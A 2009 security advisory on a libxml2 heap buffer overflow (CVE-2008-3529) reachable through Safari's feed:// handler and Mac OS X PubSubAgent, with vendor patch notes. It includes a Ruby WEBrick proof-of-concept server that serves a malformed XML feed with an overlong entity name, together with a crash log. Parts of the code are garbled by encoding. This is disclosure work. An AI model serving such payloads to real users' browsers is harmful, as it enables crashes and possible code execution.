Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20090622
Product Name : Mac OS X Publication Subscription
Product Version : < Safari 3.2.3
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : APPLE-SA-2009-05-12
Discovery Date : 08/2008
______________________________________________________________________________________________________________
[Product Description]
—————————————————————————————————
Now your favorite web browser is also the fastest on any platform. With page load speeds that outperform every other major browser on the Mac or PC, Safari also introduces a few new features to the mix.
Thanks to the built-in RSS reader in Safari, you can scan the latest news, information, and articles from thousands of websites in one simple-to-read, searchable article list that Safari assembles for you. The first browser to feature a built-in RSS reader, Safari is the ideal way to browse the entire web without using a second application.
Introduced in Mac OS X v10.5, Publication Subscription is a technology that offers developers a way to subscribe to web feeds from their applications. Web feeds are documents that contain frequently updated information. You can use Publication Subscription to allow your applications to subscribe to podcasts, photocasts, and any other feed-based document. Publication Subscription handles all the feed downloads and updates automatically. Publication Subscription technologies make use of libxml2 in order to parse RSS data.
Libxml2 is the XML C parser and toolkit developed for the Gnome project (but usable outside of Gnome), it is free software available under the MIT License. XML itself is a metalanguage used to design markup languages, i.e. text language where semantic and structure are added to the content using extra “markup” information enclosed between angle brackets.
[Technical Summary]
—————————————————————————————————
“The ‘libxml’ library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability.”
– http://www.securityfocus.com/bid/31126
Safari uses the vulnerable libxml library and can be attacked via the feed:// input vector.
[Technical Details]
—————————————————————————————————-
Libxml2 is vulnerable to a heap-based buffer overflow, caused by improper bounds checking in the xmlParseAttValueComplex() function. By parsing exceedingly long XML entity names using Libxml2, a remote attacker can overflow a buffer and execute arbitrary code on the system. If code execution fails a Denial of Service condition may happen.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
https://bugzilla.redhat.com/show_bug.cgi?id=461015
http://rhn.redhat.com/errata/RHBA-2008-0878.html
https://bugzilla.redhat.com/show_bug.cgi?id=460396
[Proof Of Concept]
—————————————————————————————————
The following testcases allowed for the creation of the below PoC
https://bugzilla.redhat.com/attachment.cgi?id=315476
https://bugzilla.redhat.com/attachment.cgi?id=315477
https://bugzilla.redhat.com/attachment.cgi?id=315478
https://bugzilla.redhat.com/attachment.cgi?id=315479
https://bugzilla.redhat.com/attachment.cgi?id=315480
https://bugzilla.redhat.com/attachment.cgi?id=315481
https://bugzilla.redhat.com/attachment.cgi?id=315482
#!/usr/bin/ruby
#
# The application PubSubAgent quit unexpectedly.
#
# Process: PubSubAgent [3764]
# Path: /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent
# Identifier: PubSubAgent
# Version: ??? (???)
# Code Type: X86 (Native)
# Parent Process: launchd [282]
#
# Date/Time: 2008-10-31 15:31:41.355 -0400
# OS Version: Mac OS X 10.5.5 (9F33)
# Report Version: 6
#
# Exception Type: EXC_BAD_ACCESS (SIGSEGV)
# Exception Codes: KERN_INVALID_ADDRESS at 0×0000000005050500
#
# Thread 0 crashed with X86 Thread State (32-bit):
# eax: 0×41414141 ebx: 0×94580535 ecx: 0×00136150 edx: 0×05050500
# edi: 0×00007000 esi: 0×00100000 ebp: 0xbfffe298 esp: 0xbfffe220
# ss: 0x0000001f efl: 0×00010206 eip: 0×94580605 cs: 0×00000017
# ds: 0x0000001f es: 0x0000001f fs: 0×00000000 gs: 0×00000037
# cr2: 0×05050500
require ‘webrick’
include WEBrick
XML_LOVE =
‘‘ + “\n” +
‘
'‘ + “\n” +
‘
"A" * 1000 + " " +
'"ha"> ]>’ + “\n” +
‘
REDIR_LOVE =
‘‘
s = HTTPServer.new( 
ort => 80 )
class REDIRECT < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = REDIR_LOVE
res['Content-Type'] = "text/html"
end
end
class XMLLOVER < HTTPServlet::AbstractServlet
def do_GET(req, res)
res.body = XML_LOVE
res['Content-Type'] = "text/xml"
end
end
s.mount("/", REDIRECT)
s.mount("/pwn", XMLLOVER)
trap("INT"){ s.shutdown }
s.start
[Fix]
---------------------------------------------------------------------------------------------------
https://bugzilla.redhat.com/attachment.cgi?id=315291
http://lists.apple.com/archives/security-announce/2009/May/msg00000.html
[Vendor Status]
—————————————————————————————————
Vendor Notified
[Vendor Comments]
—————————————————————————————————
Safari 3.2.3 is now available and addresses the following:
libxml
CVE-ID: CVE-2008-3529
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista
Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution
Description: A heap buffer overflow exists in libxml’s handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3 on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11 with Security Update 2009-002 installed.
